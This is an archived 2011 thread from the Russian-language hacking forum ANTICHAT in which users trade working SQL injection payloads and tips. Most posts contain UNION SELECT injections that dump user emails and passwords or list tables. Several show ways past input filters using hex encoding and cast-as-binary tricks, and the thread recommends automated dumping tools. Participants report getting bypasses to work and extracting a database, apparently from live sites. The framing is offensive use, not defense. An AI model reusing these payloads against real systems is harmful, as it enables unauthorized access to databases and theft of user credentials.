ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.02.2011, 01:04
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Redwood
Redwood said:
Я не просто отправил в поиск, а еще и дал ссылку на топик
/showthread.php?t=240692
Как вариант, пробуй rsaUnDumper[sql] – универсальный дампер SQL INJECTION.
rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций
А если GETом то вот таких уж точно не признает
555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a
|
|
|
07.02.2011, 01:12
|
|
Постоянный
Регистрация: 19.09.2008
Сообщений: 511
Провел на форуме:
1866685
Репутация:
340
|
|
Спасибо. Но тогда возникает вопрос по проге.
В ней надо что бы заканчивался запрос на +limit+
Как это сделать со стандартной скулей?
UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
|
|
|
|
07.02.2011, 01:23
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Fooog
Fooog said:
Спасибо. Но тогда возникает вопрос по проге.
В ней надо что бы заканчивался запрос на +limit+
Как это сделать со стандартной скулей?
UNION SELECT 1,2,TABLE_NAME,4 ,5 FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1 --
тут просто даеш проге так:
pxxp://site.com/script.php?id=1 UNION SELECT 1,2,,4 ,5 FROM INFORMATION_SCHEMA.TABLES+limit+
а в поле "Что нужно сдампить" ставиш TABLE_NAME
воббще если надо сначала тока табли слит быстро то вот так можно:
pxxp://site.com/script.php?id=1 UNION SELECT 1,2,(select concat(0x7e,0x27,Hex(cast(group_concat(table_name) as char)),0x27,0x7e) FROM information_schema.tables),4 ,5 --
выдает все табли разом в хексе
|
|
|
|
07.02.2011, 01:51
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от YuNi|[c
YuNi|[c said:
rsaundumper хорошо работает многопоточно, но там не поддерживается(может пока) запросы через POST инъекций
А если GETом то вот таких уж точно не признает
555555' UNION ALL SELECT 1,2,(SELECT concat(0x7e,0x27,unhex(Hex(cast(user.EMAIL as char))),0x5e,unhex(Hex(cast(user.PASSWORD as char))),0x27,0x7e) FROM `db`.user LIMIT 10000,1) -- a
POST запросы поддерживаются в версии 2.0
Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась
https://rdot.org/forum/showthread.php?t=1142
Добавил версию 2.0 /showpost.php?p=2544529&postcount=10
|
|
|
|
07.02.2011, 02:16
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Redwood
Redwood said:
POST запросы поддерживаются в версии 2.0, просто я не обратил внимание какая версия выложена в топике, думал что она и есть, сейчас добавлю.
Для более сложных запросов подойдет Toolza от Pashkel'ы, которая кстати недавно обновилась https://rdot.org/forum/showthread.php?t=1142
я не посмотрель что ты выложил, у меня уже был какой то версия.
Ну тулзу я пробовал новую версию, но тоже не может хавать такие запросы
тут даже попросил кодерам подсказать или наколбасит
пару строк на перле именно для таких скулей(правда там дал я на одну колонку а тут две колонки)
/showthread.php?p=2536279
остался без ответа там
|
|
|
|
07.02.2011, 19:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
|
|
|
|
07.02.2011, 20:07
|
|
Участник форума
Регистрация: 10.09.2009
Сообщений: 120
Провел на форуме:
2212846
Репутация:
56
|
|
Сообщение от Чакэ
Чакэ said:
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
http://forum.antichat.net/thread104591.html
Вопрос №2
|
|
|
|
07.02.2011, 20:16
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476
Репутация:
66
|
|
Сообщение от Чакэ
Чакэ said:
такой вопрос на счет фильтраций: ?var=-1+union+select+1,count(*),3,4,5+from information_schema.columns+where+table_schema!='in formation_schema'+--+ выводит количество, то есть не фильтруются даже кавычки, но вот выдернуть данные не получается вообще никакие. version() user() database() это все дает false. пробовал и так /*!verSion()*/ и 0x76657273696F6E2829 один хер - false. и это не только на эти три "слова", на все данные что пихаю в запрос.. не могу понять что за фильтры там стоят. если уже такое было не пинайте, тема большая всю ниасилить на трезвую голову.. буду рад ссылочке где описаны разные способы обхода такого рода фильтров.
да Redwood точно указал еще можно так:
unhex(Hex(cast(Version() as char)))
cast(Version()+as+binary)
|
|
|
|
07.02.2011, 20:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
90728
Репутация:
62
|
|
Redwood, очень благодарен cast(concat_ws(0x3a,version(),user(),database())+a s+binary) - true
|
|
|
|
07.02.2011, 21:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
28895
Репутация:
4
|
|
Вытянул дб, а нужные колонки в таком виде 000000060664599b, чем расшифровать? или подскажите алгоритм, который используется ...
Все разобрался, это уникальный идентификатор присвоенный скриптом ...
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
